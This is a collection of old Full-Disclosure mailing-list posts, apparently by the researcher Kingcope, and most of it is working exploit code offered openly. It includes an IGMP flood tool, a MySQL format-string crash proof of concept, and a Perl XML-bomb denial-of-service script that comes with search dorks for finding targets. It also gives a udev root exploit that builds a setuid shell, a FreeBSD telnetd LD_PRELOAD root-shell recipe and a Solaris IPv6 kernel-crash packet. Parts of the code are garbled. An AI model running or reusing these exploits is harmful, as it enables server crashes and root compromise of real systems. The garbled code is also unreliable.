+on freebsd you can symlink directories like ´/´
Cheerio,
Kingcope
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Some small noday XD
gs; // Flags
unsigned char ttl; // Time to live
unsigned char proto; // Protocol (TCP, UDP etc)
unsigned short checksum; // IP checksum
unsigned int sourceIP; // Source IP
unsigned int destIP; // Destination IP
unsigned short options[2];
};
struct igmphdr {
unsigned char type;
unsigned char code;
unsigned short checksum;
unsigned long group;
unsigned char ResvSQVR;
unsigned char QQIC;
unsigned short num;
unsigned long addes[0x/4-2];
};
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while (size > 1) {
cksum += *buffer++;
size -= sizeof(USHORT);
}
if (size)
cksum += *(UCHAR*)buffer;
cksum = (cksum >> 16) + (cksum & 0x);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
int sendIGMP(char* a, char* b)
{
unsigned int dst_addr, src_addr;
struct iphdr ipHeader;
struct igmphdr igmpHeader;
dst_addr=inet_addr (b);
src_addr=inet_addr (a);
int rect;
char szSendBuf[sizeof(ipHeader)+sizeof(igmpHeader)];
memset(szSendBuf, 0, sizeof(ipHeader)+sizeof(igmpHeader));
SOCKET sock;
if ((sock = socket(AF_INET,SOCK_RAW, IPPROTO_RAW)) < 0) {
printf("Create socket error");
return FALSE;
}
BOOL flag=TRUE;
if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag))
== SOCKET_ERROR) {
printf("Set options error");
closesocket(sock);
return FALSE;
}
struct sockaddr_in ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=htons(99);
ssin.sin_addr.s_addr=dst_addr;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.ident=htons(1000);
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_IGMP;
ipHeader.checksum=0;
ipHeader.tos=0;
ipHeader.destIP=dst_addr;
ipHeader.sourceIP=src_addr;
////Ip options
ipHeader.options[0]=htons(0x);
ipHeader.options[1]=htons(0x);
memset(&igmpHeader, 0, sizeof(igmpHeader));
igmpHeader.type=0x11; //v3 Membership Query
igmpHeader.code=0xff;
igmpHeader.num=htons(0x/4-200);
igmpHeader.ResvSQVR=0xff;
igmpHeader.QQIC=0;
igmpHeader.group=inet_addr("224.0.0.2");
int x1,x2; int vv=0;
int k=0;
printf("fillin...\n");
for (x1=0;x1<256;x1++) {
for (x2=0;x2<256;x2++) {
char buf[100];
int xx1 = x1;
int xx2 = x2;
sprintf(buf, "%d.%d.%d.%d", rand() % (256), rand() % 256,
rand() %
256, rand() % 256);
if (vv >= 0x/4-2) goto label1;
igmpHeader.addes[vv]=inet_addr(buf);
vv++;
}
}
printf("okay\n");
label1:
printf("okay2\n");
for (k=0;k>3)|0x2000);
if (k==(sizeof(igmpHeader)/BIGIGMP)-1) {
ipHeader.frag_and_flags=htons(((BIGIGMP * k)>>3));
}
igmpHeader.checksum=0;
char c[sizeof(igmpHeader)];
memcpy(c, &igmpHeader, sizeof(igmpHeader));
igmpHeader.checksum=checksum((USHORT *)c,sizeof(igmpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
char *p = &igmpHeader;
p+=BIGIGMP*k;
memcpy(szSendBuf+sizeof(ipHeader), p, BIGIGMP);
//memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);
ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf,
sizeof(ipHeader)+BIGIGMP));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=sendto(sock, szSendBuf, sizeof(ipHeader)+BIGIGMP,0,&ssin,
sizeof(ssin));
if (rect==SOCKET_ERROR) {
perror("");
closesocket(sock);
return 0;
}
}
closesocket(sock);
return 1;
}
int main(int argc, char **argv)
{
if(argc<2)
{
printf("\nIGMP v3 testing script by kcope based on
code by Alexey Sintsov\n\n");
printf("Usage:\n");
printf("c:\\igmp.exe \n\n");
return 0;
}
while(1)
sendIGMP(argv[2], argv[1]);
printf (".\n");
return 0;
}
--- snip ---
Cheers,
Kingcope, E-Mail: kcope2googlemail.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MySQL <= 5.0.45 post auth format string vulnerability
MySQL (tested: Version 5.0.45 on CentOS (Linux)) Format String Vulnerability
MySQL General Available (GA) Release is vulnerable.
Latest MySQL Version is not vulnerable since the bug if ifdef'ed off.
from mysql-5.0.75 source (mysql-5.0.75.tar.gz) in the file
libmysqld/sql_parse.cc
this source code is also included in mysql-4.0.0, mysql versions >=
4.0.0 are affected.
function prototype: write(THD *thd, enumenum_server_command command,
const char* format, ...)
function call: write(thd, command, packet);
on line 2084:
case COM_CREATE_DB: // QQ: To be removed
{
char *db=thd->strdup(packet), *alias;
HA_CREATE_INFO create_info;
statistic_increment(thd->status_var.com_stat[SQLCOM_CREATE_DB],
&LOCK_status);
// null test to handle EOM
if (!db || !(alias= thd->strdup(db)) || check_db_name(db))
{
my_error(ER_WRONG_DB_NAME, MYF(0), db ? db : "NULL");
break;
}
if (check_access(thd,CREATE_ACL,db,0,1,0,is_schema_db(db)))
break;
[1] mysql_log.write(thd,command,packet);
bzero(&create_info, sizeof(create_info));
mysql_create_db(thd, (lower_case_table_names == 2 ? alias : db),
&create_info, 0);
break;
}
line 2105:
case COM_DROP_DB: // QQ: To be removed
{
statistic_increment(thd->status_var.com_stat[SQLCOM_DROP_DB],
&LOCK_status);
char *db=thd->strdup(packet);
/* null test to handle EOM */
if (!db || check_db_name(db))
{
my_error(ER_WRONG_DB_NAME, MYF(0), db ? db : "NULL");
break;
}
if (check_access(thd,DROP_ACL,db,0,1,0,is_schema_db(db)))
break;
if (thd->locked_tables || thd->active_transaction())
{
my_message(ER_LOCK_OR_ACTIVE_TRANSACTION,
ER(ER_LOCK_OR_ACTIVE_TRANSACTION), MYF(0));
break;
}
[2] mysql_log.write(thd,command,db);
mysql_rm_db(thd, db, 0, 0);
break;
}
at [1] and [2] there is a call to mysql_log.write() without
format string specifiers leading to a format string bug.
authentication is required.
COM_CREATE_DB and COM_DROP_DB are "legacy" code. Recent clients
does not use this functions to create and drop databases.
Older clients do. Even Newest GA version of mysqld is able to handle
the requests though.
mysql logging has to be enabled. it seems acls are enforced, so
create db or drop db privs may be required, though untested.
--> my.cnf at [mysqld] log=/var/log/mysql.log for example
PROOF OF CONCEPT WHICH CRASHES MYSQLD FOLLOWS
MYSQLD RESTARTS IMMEDIATELY
CAUSE: SIGNAL SEGV
~~
---snip---
#include
#include
#define USE_OLD_FUNCTIONS
#include
#define NullS (char *) 0
int
main (int argc, char **argv)
{
MYSQL *mysql = NULL;
mysql = mysql_init (mysql);
if (!mysql)
{
puts ("Init faild, out of memory?");
return EXIT_FAILURE;
}
if (!mysql_real_connect (mysql, /* MYSQL structure to use */
"localhost", /* server hostname or IP address */
"monty", /* mysql user */
"montypython", /* password */
NULL, /* default database to use, NULL
for none */
0, /* port number, 0 for default */
NULL,/* socket file or named pipe name */
CLIENT_FOUND_ROWS /* connection flags */ ))
{
puts ("Connect failed\n");
}
else
{
puts ("Connect OK\n");
// mysql_create_db(mysql, "%s%s%s%s%s");
simple_command(mysql, COM_CREATE_DB, argv[1], strlen(argv[1]), 0);
}
mysql_close (mysql);
return EXIT_SUCCESS;
}
---snip---
reproduce:
$gcc mysql_format.c -o mysql_format -lmysqlclient
$./mysql_format %s%s%s%s%s
Debugging output follows - Crashdump and strace output
~~
Version: '5.0.45-log' socket: '/var/lib/mysql/mysql.sock' port: 3306
Source distribution
090620 1:53:52 - mysqld got signal 11;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help diagnose
the problem, but since we have already crashed, something is definitely wrong
and this may fail.
key_buffer_size=8388600
read_buffer_size=131072
max_used_connections=1
max_connections=100
threads_connected=1
It is possible that mysqld could use up to
key_buffer_size + (read_buffer_size +
sort_buffer_size)*max_connections = 225791 K
bytes of memory
Hope that's ok; if not, decrease some variables in the equation.
thd=0x8aea8a8
Attempting backtrace. You can
Re: [Full-disclosure] Oops! About xscreensaver 5.01
Hello again, The described xscreensaver vulnerability affects Opensolaris (11 for sure, maybe 10 also) xscreensaver 5.01 builds ONLY. I could not reproduce the vuln on FreeBSD or Linux. (This is getting boring I know, have a nice day) Thanks and Best Regards, Nikolaos Rangos 2009/7/6 Kingcope : > Hmmm, > sorry for flooding the list but it seems it doesnt even affect > xscreensaver 5.01. > I will investigate when the vuln when I have time and keep you informed. > There has to be some strange conf on my Opensolaris :) > > Best Regards, > > kcope > > 2009/7/6 Kingcope : >> Hello list, >> Just to clarify, I tested some operating systems against the >> xscreensaver vulnerability >> I posted yesterday. >> It affects at least xscreensaver 5.01. >> >> It does not affect recent versions as reported >> by the Debian bug tracking people, this is confirmed. >> >> Sorry about not catching this. >> >> Best Regards, >> /nr >> > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Oops! About xscreensaver 5.01
Hmmm, sorry for flooding the list but it seems it doesnt even affect xscreensaver 5.01. I will investigate when the vuln when I have time and keep you informed. There has to be some strange conf on my Opensolaris :) Best Regards, kcope 2009/7/6 Kingcope : > Hello list, > Just to clarify, I tested some operating systems against the > xscreensaver vulnerability > I posted yesterday. > It affects at least xscreensaver 5.01. > > It does not affect recent versions as reported > by the Debian bug tracking people, this is confirmed. > > Sorry about not catching this. > > Best Regards, > /nr > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oops! About xscreensaver 5.01
Hello list, Just to clarify, I tested some operating systems against the xscreensaver vulnerability I posted yesterday. It affects at least xscreensaver 5.01. It does not affect recent versions as reported by the Debian bug tracking people, this is confirmed. Sorry about not catching this. Best Regards, /nr ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Some small 0day...
Please consult the links. SunOne Webserver : http://isowarez.de/SunOne_Webserver.txt xscreensaver : http://isowarez.de/xscreensaver.txt Best Regards, Nikolaos Rangos ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The father of all bombs - another webdav fiasco
Apache mod_dav / svn Remote Denial of Service Exploit
Google Dorks:
inurl:svn inurl:trunk
"powered by subversion version"
Information on the bug (XML Bomb):
http://blog.didierstevens.com/2008/09/23/dismantling-an-xml-bomb/
Enjoy!
---
###apache-ied.pl
### Apache mod_dav / svn Remote Denial of Service Exploit
### by kcope / June 2009
###
### Will exhaust all system memory
### Needs Authentication on normal DAV
###
### This can be especially serious stuff when used against
### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##
use IO::Socket;
use MIME::Base64;
sub usage {
print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "usage: perl apache-ied.pl
[username] [password]\n";
print "example: perl apache-ied.pl svn.XXX.com /projects/\n";exit;
}
if ($#ARGV < 1) {usage();}
$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$username = $ARGV[2];
$password = $ARGV[3];
$|=1;
$BasicAuth = encode_base64("$username:$password");
chomp $BasicAuth;
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
PeerPort => 80,
Proto=> 'tcp');
print $sock "PROPFIND $webdavfile HTTP/1.1\r\n";
print $sock "Host: $hostname\r\n";
print $sock "Depth: 0\r\n";
print $sock "Connection: close\r\n";
if ($username ne "") {
print $sock "Authorization: Basic $BasicAuth\r\n";
}
print $sock "\r\n";
$x = <$sock>;
print $x;
if (!($x =~ /207/)) {
while(<$sock>) {
print;
}
close($sock);
print "No PROPFIND on this server and path.\n";
exit(0);
}
$a = "";
for ($i=1;$i<256;$i++) {# Here you can increase the XML bomb
count
$k = $i-1;
$a .= "\n"
}
$igzml =
"\n"
."\n"
."\n"
.$a
."]>\n"
."\n"
."&x$k;\n"
."\n";
print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "Launching DoS Attack...\n";
$ExploitRequest =
"PROPFIND $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n"
."Depth: 0\r\n";
if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length:
".length($igzml)."\r\n\r\n" . $igzml;
while(1) {
again:
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
PeerPort => 80,
Proto=> 'tcp') || (goto again);
print $sock $ExploitRequest;
print ";Pp";
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] udev exploit - SECURITYFOCUS.COM edits your exploits
Hello people for some reason someone on securityfocus.com thinks he or she´s a genuis. The exploit at http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2009-04/msg00204.html and http://downloads.securityfocus.com/vulnerabilities/exploits/34536.sh differ so much that the exploit is even not compilable. Look at the inserted EOF's .. Dirty little security industry. Use the exploit at full disclosure and forget about the other. Cherrio, kcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] udev exploit
(see attached)
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%...@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/suid", "suid", (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include
#include
#include
#include
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s
/tmp/suid",NULL);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FreeBSD zeroday
FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation -
And possible remote root code excution.
There is a rather big bug in the current FreeBSD telnetd daemon.
The environment is not properly sanitized when execution /bin/login,
what leads to a (possible) remote root hole.
The telnet protocol allows to pass environment variables inside the
telnet traffic and assign them to the other side of the tcp connection.
The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD)
environment variables prior to executing /bin/login.
So passing an environment variable with the identifier LD_PRELOAD and
the value of a precompiled library that is on the filesystem of the
victims box that includes malicious code is possible.
When /bin/login is executed with the user id and group id 0 ('root') it preloads
the library that was set by remote connection through a telnet environment
definition and executes it.
It is unlikely that this bug can be exploited remotely but is not impossible.
An attacker could f.e. upload a malicious library using ftp (including anonymous
ftp users), nfs, smb or any other (file) transfer protocol.
One scenario to exploit the bug remotely would be a ftp server running beside
the telnet daemon serving also anoynmous users with write access. Then the
attacker would upload the malicious library and defines the LD_PRELOAD
variable to something similar to /var/ftp/mallib.so to gain remote root access.
Here comes the actual exploit which can be executed with standard UNIX tools.
Paste this into a file using your favorite text editor:
---snip-
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009
#include
#include
#include
#include
void _init() {
FILE *f;
setenv("LD_PRELOAD", "", 1);
system("echo ALEX-ALEX;/bin/sh");
}
---snip-
Then we compile this stuff.
---snip-
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o
-nostartfiles
---snip-
Then we copy the file to a known location (local root exploit)
---snip-
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-
...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.
---snip-
#telnet
>auth disable SRA
>environ define LD_PRELOAD /tmp/libno_ex.so.1.0
>open target
---snip-
ALEX-ALEX
#ROOTSHELL
This will give us an immediate (probably remote) root shell.
This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install
with telnetd enabled. Other version of FreeBSD may also be affected,
OpenBSD and NetBSD where not tested but MAY contain the same bug because
of historic reasons.
Signed,
Kingcope[nikolaos rangos]/2009
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Solaris Devs Are Smoking Pot
Regards,
2009/Kingcope
/*
SunOS Release 5.11 Version snv_101b Remote IPV6
Kernel Crash Exploit 0day
By Kingcope/2009
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
unsigned char rawData[] =
"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
"\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
"\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";
int main(int argc, char *argv[])
{
struct sockaddr_in6 dst;
int s;
if (argc < 2)
{
printf("SunOS Release 5.11 Version snv_101b Remote IPV6 Kernel Crash Exploit 0day By Kingcope/2009\n");
printf("Usage: %s \n", *argv);
return(1);
}
memset(&dst, 0, sizeof(dst));
if (inet_pton(AF_INET6, (char *)argv[1], (struct in6_addr *) &dst.sin6_addr) != 1) {
printf("Error: inet_pton()\n");
exit(-1);
}
memcpy(rawData+24, &dst.sin6_addr, 16);
dst.sin6_family = AF_INET6;
s = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
printf("Sending IPV6 packet: %s\n", argv[1]);
if (sendto(s,&rawData,sizeof(rawData),0,(struct sockaddr*)&dst,sizeof(dst)) == -1)
{
perror("Error sending packet");
exit(-1);
}
return(0);
}
/*
Kernel Crash Dump May Look Like The Following Snippet
[ID 965332 kern.notice] ipsec_needs_processing_v6
[ID 10 kern.notice]
[ID 655072 kern.notice] ff00012b9650 ip:ipsec_needs_processing_v6+10c ()
[ID 655072 kern.notice] ff00012b96f0 ip:ipsec_early_ah_v6+75 ()
[ID 655072 kern.notice] ff00012b9860 ip:ip_rput_data_v6+f4e ()
[ID 655072 kern.notice] ff00012b9940 ip:ip_rput_v6+64e ()
[ID 655072 kern.notice] ff00012b99b0 unix:putnext+21e ()
[ID 655072 kern.notice] ff00012b9a00 dld:dld_str_rx_fastpath+8a ()
[ID 655072 kern.notice] ff00012b9ad0 dls:i_dls_link_rx+2c7 ()
[ID 655072 kern.notice] ff00012b9b50 mac:mac_do_rx+b7 ()
[ID 655072 kern.notice] ff00012b9b80 mac:mac_rx+1f ()
[ID 655072 kern.notice] ff00012b9bd0 e1000g:e1000g_intr+135 ()
[ID 655072 kern.notice] ff00012b9c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ff00012b9c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ff00012c5870 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ff00012c58c0 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ff00012c58d0 unix:cmnint+ba ()
[ID 655072 kern.notice] ff00012c5a00 unix:ddi_mem_putb+f ()
[ID 655072 kern.notice] ff00012c5a40 ata:ata_disk_start_dma_out+88 ()
[ID 655072 kern.notice] ff00012c5a90 ata:ata_ctlr_fsm+1fb ()
[ID 655072 kern.notice] ff00012c5af0 ata:ata_hba_start+84 ()
[ID 655072 kern.notice] ff00012c5b30 ata:ghd_waitq_process_and_mutex_hold+df ()
[ID 655072 kern.notice] ff00012c5ba0 ata:ghd_intr+8d ()
[ID 655072 kern.notice] ff00012c5bd0 ata:ata_intr+27 ()
[ID 655072 kern.notice] ff00012c5c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ff00012c5c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ff0001205ab0 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ff0001205b00 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ff0001205b10 unix:cmnint+ba ()
[ID 655072 kern.notice] ff0001205c00 unix:mach_cpu_idle+b ()
[ID 655072 kern.notice] ff0001205c40 unix:cpu_idle+17b ()
[ID 655072 kern.notice] ff0001205c60 unix:idle+4c ()
[ID 655072 kern.notice] ff0001205c70 unix:thread_start+8 ()
[ID 10 kern.notice]
[ID 672855 kern.notice] syncing file systems...
[ID 904073 kern.notice] done
[ID 111219 kern.notice] dumping to /dev/zvol/dsk/rpool/dump, offset 65536, content: kernel
[ID 409368 kern.notice] ^M100% done: 56726 pages dumped, compression ratio 3.59,
[ID 851671 kern.notice] dump succeeded
[ID 540533 kern.notice] ^MSunOS Release 5.11 Version snv_101b 64-bit
[ID 172908 kern.notice] Copyright 1983-2008 Sun Microsystems, Inc. All rights reserved.
*/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pwnie Awards 2008
OOPS!: By question I landed on the Server Side Bug Nomination List Again. Thanks for riding this Ceremony. kcope / eliteb0y / Nikos OOPS I did it again (fool(disclosure)) 2008/7/21 David Litchfield <[EMAIL PROTECTED]>: > Hey Alexandr, > I see I'm invited to award Brett his pwnie for his SQL flaw if he wins. I'd > be more than happy to - after all one bug over 3 years means someone did a > really good job ;) > Cheers, > David > > -- > E-MAIL DISCLAIMER > > The information contained in this email and any subsequent > correspondence is private, is solely for the intended recipient(s) and > may contain confidential or privileged information. For those other than > the intended recipient(s), any disclosure, copying, distribution, or any > other action taken, or omitted to be taken, in reliance on such > information is prohibited and may be unlawful. If you are not the > intended recipient and have received this message in error, please > inform the sender and delete this mail and any attachments. > > The views expressed in this email do not necessarily reflect NGS policy. > NGS accepts no liability or responsibility for any onward transmission > or use of emails and attachments having left the NGS domain. > > NGS and NGSSoftware are trading names of Next Generation Security > Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 > 4BF with Company Number 04225835 and VAT Number 783096402 > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AFK from full-disclosure
I am reachable 0nly @ two addresses from now on: http://www.milw0rm.com http://www.com-winner.com Thanks n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AFK from fool-disclosure
I am reachable 0nly @ two addresses: http://www.milw0rm.com http://www.com-winner.com Thanks n3td3v Signed, KingCope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???
Hello 3APA3A,
Yes saw that before, the weired thing is that the
screenshot shows the page at the
Wwwroot ("/") displaying the error after running
the script.
Best Regards,
Kingcope
-Original Message-
From: 3APA3A [mailto:[EMAIL PROTECTED]
Sent: Wednesday, May 23, 2007 12:21 PM
To: kingcope
Cc: 'Full-Disclosure'
Subject: Re[2]: [Full-disclosure] Question Regarding IIS 6.0 / Is this a
DoS???
Dear kingcope,
With debugging it looks quite harmless:
Server Error in '/' Application.
Directory '\\.\aux' does not exist. Failed to start monitoring file changes.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
Exception Details: System.Web.HttpException: Directory '\\.\aux' does not
exist. Failed to start monitoring file changes.
Source Error:
An unhandled exception was generated during the execution of the current web
request. Information regarding the origin and location of the exception can
be identified using the exception stack trace below.
Stack Trace:
[HttpException (0x80070002): Directory '\\.\aux' does not exist. Failed to
start monitoring file changes.]
System.Web.FileChangesMonitor.FindDirectoryMonitor(String dir, Boolean
addIfNotFound, Boolean throwOnError) +527
System.Web.FileChangesMonitor.StartMonitoringPath(String alias,
FileChangeEventHandler callback) +477
System.Web.Caching.CacheDependency.Init(Boolean isPublic, Boolean
isSensitive, String[] filenamesArg, String[] cachekeysArg, CacheDependency
dependency, DateTime utcStart) +1535
System.Web.Caching.CacheDependency..ctor(Boolean isSensitive, String[]
filenames, DateTime utcStart) +50
System.Web.Configuration.HttpConfigurationSystem.GetCacheDependencies(Hashta
ble cachedeps, DateTime utcStart) +151
System.Web.Configuration.HttpConfigurationSystem.ComposeConfig(String
reqPath, IHttpMapPath configmap) +760
System.Web.HttpContext.GetCompleteConfigRecord(String reqpath,
IHttpMapPath configmap) +434
System.Web.HttpContext.GetCompleteConfig() +49
System.Web.HttpContext.GetConfig(String name) +195
System.Web.CustomErrors.GetSettings(HttpContext context, Boolean
canThrow) +20
System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow)
+39
System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext
context, Exception e) +486
Version Information: Microsoft .NET Framework Version:1.1.4322.2032; ASP.NET
Version:1.1.4322.2032
--Wednesday, May 23, 2007, 1:35:17 PM, you wrote to [EMAIL PROTECTED]:
k> Btw,
k> Here is a screenshot of the effect.
k> -Original Message-
k> From: kingcope [mailto:[EMAIL PROTECTED]
k> Sent: Wednesday, May 23, 2007 10:55 AM
k> To: '3APA3A'
k> Cc: 'Full-Disclosure'; '[EMAIL PROTECTED]'
k> Subject: RE: [Full-disclosure] Question Regarding IIS 6.0 / Is this a
DoS???
k> Hello Russian friend,
k> This is an interesting thought. As you see in the exception
k> And in the exception backtrace of IIS it tries to access \\.\AUX
k> Or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).
k> Best Regards,
k> Kingcope
k> -Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED]
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a
DoS???
k> Dear kingcope,
k> It's vulnerability regardless of DoS impact, because it allows attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from device attached to COM1 or prevent another application
>>>from accessing this port (or LPT), because access to ports is exclusive.
k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:
k>> Hello List,
k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond as
k>> Normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some
k> servers
k>> On the internet get quite instable, some do not. On some servers after I
k>> Stop the attack I get an exception that the Server is too busy/Unhandled
